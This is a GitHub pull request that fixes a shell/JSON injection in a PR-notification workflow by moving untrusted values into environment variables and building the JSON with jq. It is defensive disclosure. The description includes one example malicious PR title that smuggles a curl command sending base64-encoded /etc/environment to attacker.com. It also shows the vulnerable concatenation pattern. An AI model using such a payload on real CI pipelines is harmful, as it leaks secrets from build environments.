
fix(security): prevent shell/JSON injection via PR title in Chat notification workflow#606

Open
XananasX7 wants to merge 1 commit into
google:mainfrom
XananasX7:fix/security-shell-injection-pr-title

Conversation

@XananasX7


Summary

The pr_notification.yml workflow uses PR title and labels with the pattern '"'"$TITLE"'"' inside a shell-constructed JSON string — a shell/JSON injection vector.

Vulnerability

TITLE: ${{ github.event.pull_request.title }}
...
"content": "'"$TITLE"'"  # ← directly interpolated in shell JSON

A PR with a title containing a single quote (') or other shell metacharacters can:

  1. Break out of the JSON string, poisoning the webhook payload
  2. Potentially execute arbitrary shell commands if the injection reaches a subshell expansion

Example malicious PR title: '; curl https://attacker.com/$(cat /etc/environment | base64); echo '

Fix

Extract all untrusted event values into env vars and build the JSON payload with jq, which properly escapes all special characters. This is the standard safe pattern for constructing JSON payloads from untrusted input in shell scripts.

…on workflow

The pr_notification.yml workflow used PR title and labels with the
pattern '"'"$TITLE"'"' inside a JSON string — a classic shell/JSON
injection vector. A PR with a title containing single quotes breaks
out of the JSON, allowing arbitrary data injection into the webhook
request body (e.g. replacing the WEBHOOK_URL value or injecting
unexpected JSON fields).

Fix: extract all untrusted values into env vars and build the JSON
payload with jq, which properly escapes all special characters.
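The pattern the PR description and commit message discuss, as an added example that is not the repository's own workflow: the fragile hand-built JSON step next to the hardened env-plus-jq step. The job name, the secret name CHAT_WEBHOOK_URL and the message layout are assumptions.

```yaml
# Added example, not the repository's own workflow: the fragile pattern the PR
# describes, followed by the hardened step. Secret and job names are assumed.
name: pr-notification-example
on:
  pull_request:
    types: [opened, labeled]

jobs:
  notify:
    runs-on: ubuntu-latest
    steps:
      # BEFORE: the JSON body is assembled by string concatenation in the shell.
      # A title containing a double quote or backslash breaks the JSON structure
      # and lets the title inject its own fields into the webhook request; if the
      # value were expanded with ${{ }} directly inside the script text instead of
      # via env:, the shell would also interpret it as script.
      - name: Notify (fragile pattern, shown for comparison only)
        if: false
        env:
          TITLE: ${{ github.event.pull_request.title }}
          WEBHOOK_URL: ${{ secrets.CHAT_WEBHOOK_URL }}
        run: |
          curl -sS -X POST -H 'Content-Type: application/json' \
            -d '{"content": "'"$TITLE"'"}' "$WEBHOOK_URL"

      # AFTER: every untrusted event value is passed through env: (so it is data,
      # not script text) and jq --arg serialises it as a correctly escaped JSON
      # string. Whatever the title contains, the payload stays one well-formed
      # object with exactly the fields written below.
      - name: Notify (hardened)
        env:
          TITLE: ${{ github.event.pull_request.title }}
          PR_URL: ${{ github.event.pull_request.html_url }}
          LABELS: ${{ join(github.event.pull_request.labels.*.name, ', ') }}
          WEBHOOK_URL: ${{ secrets.CHAT_WEBHOOK_URL }}
        run: |
          payload="$(jq -cn \
            --arg title "$TITLE" \
            --arg url "$PR_URL" \
            --arg labels "$LABELS" \
            '{content: ("PR opened: " + $title + " [" + $labels + "] " + $url)}')"
          curl -sS -X POST -H 'Content-Type: application/json' \
            -d "$payload" "$WEBHOOK_URL"
```

A quick check when reviewing a workflow: any `${{ github.event.* }}` expression that appears inside a `run:` block rather than under `env:` is script text, not data, and is the first thing to move.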
@google-cla

google-cla Bot commented Jun 28, 2026


Thanks for your pull request! It looks like this may be your first contribution to a Google open source project. Before we can look at your pull request, you'll need to sign a Contributor License Agreement (CLA).

View this failed invocation of the CLA check for more information.

For the most up to date status, view the checks section at the bottom of the pull request.
